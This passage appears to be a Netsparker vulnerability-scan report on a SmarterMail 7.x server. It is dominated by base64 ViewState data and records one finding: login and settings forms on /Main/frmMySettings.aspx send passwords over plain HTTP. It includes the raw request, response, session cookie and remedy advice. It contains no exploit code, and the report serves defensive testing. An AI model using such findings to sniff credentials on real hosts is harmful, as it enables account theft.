zPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Gb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBzeW5jaHJvbml6aW5nIFNtYXJ0ZXJNYWlsIHdpdGggbW9iaWxlIGRldmljZXMgYW5kIGFwcGxpY2F0aW9ucywgcGxlYXNlIHJlZmVyIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vZG93bmxvYWRzL2RvY3VtZW50cy9zbWFydGVybWFpbC9zbWFydGVybWFpbF9zeW5jaHJvbml6YXRpb25fY29sbGFib3JhdGlvbi5wZGYiIHRhcmdldCA9Il9ibGFuayI+U3luY2hyb25pemluZyB3aXRoIFNtYXJ0ZXJNYWlsPC9hPiB3aGl0ZSBwYXBlci4gU3RlcC1ieS1zdGVwIGluc3RydWN0aW9ucyBmb3Igc3luY2hyb25pemluZyBhIHNwZWNpZmljIGRldmljZSBtYXkgYWxzbyBiZSBhdmFpbGFibGUgaW4gdGhlIDxhIGhyZWY9Imh0dHA6Ly9wb3J0YWwuc21hcnRlcnRvb2xzLmNvbS9LQi9jOTYvaG93LXRvLmFzcHgiIHRhcmdldD0iX2JsYW5rIj5TbWFydGVyVG9vbHMgS25vd2xlZGdlIEJhc2U8L2E+LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3Rv
Y29sRGVzY3JpcHRpb24nPjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz48L2Rpdj48L2Rpdj48L2Rpdj5kAgYPZBYCAgEPZBYCZg9kFgICAw8WAh8CaGQCDQ9kFgICAQ9kFgICAQ8QDxYCHgdDaGVja2VkaGRkZGQYBQUdY3RsMDAkVFBIJHRhYlN0cmlwJHRhYkRlc2t0b3APMtULAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1d
AgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhARGVza3RvcAH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACXB2RGVza3RvcAtkBRxjdGwwMCRUUEgkdGFiU3RyaXAkdGFiTW9iaWxlDzLTCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Ymxp
Y0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQE1vYmlsZQH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACHB2TW9iaWxlC2QFHGN0bDAwJFRQSCR0YWJTdHJpcCR0YWJBY3RpdmUPMtMLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4w
LjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAdAQWN0aXZlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAIcHZBY3RpdmULZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJEJQSCRjaGtTaG93QXRMb2dpbgUaY3RsMDAkTVBIJGdyZEFjdGl2ZURldmljZXMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkvXrzJNslqQhhPjNEy454T+k4z/o=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"&..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for the solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
- /Main/frmMySettings.aspx

/Main/frmMySettings.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmMySettings.aspx

Form target action

frmMySettings.aspx

Request

POST /Main/frmMySettings.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmMySettings.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 23673
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=%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%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%2bZGQCDg9kFgICAQ9kFgRmDw8WAh8CaGQWAgIBD2QWBmYPDxYCHwQFBDUwMDBkZAICDw8WAh8EBQQ1MDAwZGQCAw8QDxYCHwdoZGRkZAIBDw8WAh8CaGQWAgIBD2QWBmYPDxYCHwQFAzEwMGRkAgIPDxYCHwQFAzEwMGRkAgMPEA8WAh8HaGRkZGQYBgUdY3RsMDAkVFBIJFRhYlN0cmlwJHRhYkNvbXBvc2UPMt0LAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAhAQ29tcG9zZQH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAEXB2Q29tcG9zZVNldHRpbmdzC2QFHWN0bDAwJFRQSCRUYWJTdHJpcCR0YWJEaXNwbGF5DzL%2bCwABAAAA%2f%2f%2f%2f%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%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAApVXNlckNvbnRyb2xzLlVzZXJTZXR0aW5nc19Ea
XNwbGF5U2V0dGluZ3MB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAABFwdkRpc3BsYXlTZXR0aW5ncwtkBSFjdGwwMCRUUEgkVGFiU3RyaXAkdGFiUGx1c0FkZHJlc3MPMvwLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAChVc2VyQ29udHJvbHMuVXNlclNldHRpbmdzX1BsdXNBZGRyZXNzaW5nAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAQcHZQbHVzQWRkcmVzc2luZwtkBRpjdGwwMCRUUEgkVGFiU3RyaXAkdGFiVXNlcg8y2gsAAQAAAP%2f%2f%2f%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%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAABUBVc2VyAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%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%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODl..

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:42:26 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15171
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Account Settings - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMwNTY1MDYyMA8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCgIDD2QWAgIBD2QWAgIDDw8WAh4HVmlzaWJsZWhkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgJmD2QWDAICD2QWAgIBD2QWKGYPDxYCHgpfX3JlYWRPbmx5Z2QWAgIBD2QWAgICDw8WAh8EBQVkdW1teWRkAgEPDxYCHwJoZBYCAgEPZBYCZg8QZBAVAgtTbWFydGVyTWFpbBBBY3RpdmUgRGlyZWN0b3J5FQIBMAExFCsDAmdnFgFmZAICDw8WAh8CaGQWAgIBD2QWBGYPDxYCHwRlZGQCAg8PFgIfBGVkZAIDDw8WAh8CaGQWAgIBD2QWBGYPDxYCHwQFB0xMMTIzNDVkZAICDw8WAh8EBQdMTDEyMzQ1ZGQCBA9kFgICAQ9kFgJmDw9kFgIeDGF1dG9jb21wbGV0ZQUDb2ZmZAIFD2QWAgIBD2QWAmYPD2QWAh8GBQNvZmZkAgYPZBYCAgEPZBYCZg8PZBYCHwYFA29mZmQCBw9kFgICAQ9kFgICAg8PFgIfBAURZHVtbXlAaG95dGxsYy5jb21kZAIID2QWAgIBD2QWAgICDw8WAh8EZWRkAgkPZBYCAgEPZBYCZg8QZBAVVygoR01ULTEyOjAwKSBJbnRlcm5hdGlvbmFsIERhdGUgTGluZSBXZXN0IChHTVQtMTE6MDApIE1pZHdheSBJc2xhbmQsIFNhbW9hEihHTVQtMTA6MDApIEhhd2FpaRIoR01ULTA5OjAwKSBBbGFza2EkKEdNVC0wODowMCkgVGlqdWFuYSwgQmFqYSBDYWxpZm9ybmlhJihHTVQtMDg6MDApIFBhY2lmaWMgVGltZSAoVVMgJiBDYW5hZGEpLShHTVQtMDc6MDApIENoaWh1YWh1YSwgTGEgUGF6LCBNYXphdGxhbiAtIE5ldycoR01ULTA3OjAwKSBNb3VudGFpbiBUaW1lIChVUyAmIENhbmFkYSkTKEdNVC0wNzowMCkgQXJpem9uYS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBPbGQYKEdNVC0wNjowMCkgU2Fza2F0Y2hld2FuNShHTVQtMDY6MDApIEd1YWRhbGFqYXJhLCBNZXhpY28gQ2l0eSwgTW9udGVycmV5IC0gT2xkJihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEpNShHTVQtMDY6MDApIEd1YWRhbGFqYXJhLCBNZXhpY28gQ2l0eSwgTW9udGVycmV5IC0gTmV3GyhHTVQtMDY6MDApIENlbnRyYWwgQW1lcmljYSYoR01ULTA1OjAwKSBFYXN0ZXJuIFRpbWUgKFVTICYgQ2FuYWRhKRooR01ULTA1OjAwKSBJbmRpYW5hIChFYXN0KSsoR01ULTA1OjAwKSBCb2dvdGEsIExpbWEsIFF1aXRvLCBSaW8gQnJhbmNvEyhHTVQtMDQ6MzApIENhcmFjYXMSKEdNVC0wNDowMCkgTWFuYXVzIihHTVQtMDQ6MDApIEF0bGFudGljIFRpbWUgKENhbmFkYSkSKEdNVC0wNDowMCkgTGEgUGF6FChHTVQtMDQ6MDApIFNhbnRpYWdvGChHTVQtMDM6MzApIE5ld2ZvdW5kbGFuZCQoR01ULTAzOjAwKSBCdWVub3MgQWlyZXMsIEdlb3JnZXRvd24VKEdNVC0wMzowMCkgR3JlZW5sYW5kFChHTVQtMDM6
MDApIEJyYXNpbGlhFihHTVQtMDM6MDApIE1vbnRldmlkZW8YKEdNVC0wMjowMCkgTWlkLUF0bGFudGljEihHTVQtMDE6MDApIEF6b3JlcxooR01ULTAxOjAwKSBDYXBlIFZlcmRlIElzLiUoR01UKSBDYXNhYmxhbmNhLCBNb25yb3ZpYSwgUmV5a2phdmlrPShHTVQpIEdyZWVud2ljaCBNZWFuIFRpbWUgOiBEdWJsaW4sIEVkaW5idXJnaCwgTGlzYm9uLCBMb25kb249KEdNVCswMTowMCkgQmVsZ3JhZGUsIEJyYXRpc2xhdmEsIEJ1ZGFwZXN0LCBManVibGphbmEsIFByYWd1ZSwoR01UKzAxOjAwKSBTYXJhamV2bywgU2tvcGplLCBXYXJzYXcsIFphZ3JlYi8oR01UKzAxOjAwKSBCcnVzc2VscywgQ29wZW5oYWdlbiwgTWFkcmlkLCBQYXJpczwoR01UKzAxOjAwKSBBbXN0ZXJkYW0sIEJlcmxpbiwgQmVybiwgUm9tZSwgU3RvY2tob2xtLCBWaWVubmEfKEdNVCswMTowMCkgV2VzdCBDZW50cmFsIEFmcmljYScoR01UKzAyOjAwKSBBdGhlbnMsIEJ1Y2hhcmVzdCwgSXN0YW5idWwSKEdNVCswMjowMCkgQmVpcnV0EShHTVQrMDI6MDApIEFtbWFuFShHTVQrMDI6MDApIEplcnVzYWxlbRQoR01UKzAyOjAwKSBXaW5kaG9lazkoR01UKzAyOjAwKSBIZWxzaW5raSwgS3lpdiwgUmlnYSwgU29maWEsIFRhbGxpbm4sIFZpbG5pdXMcKEdNVCswMjowMCk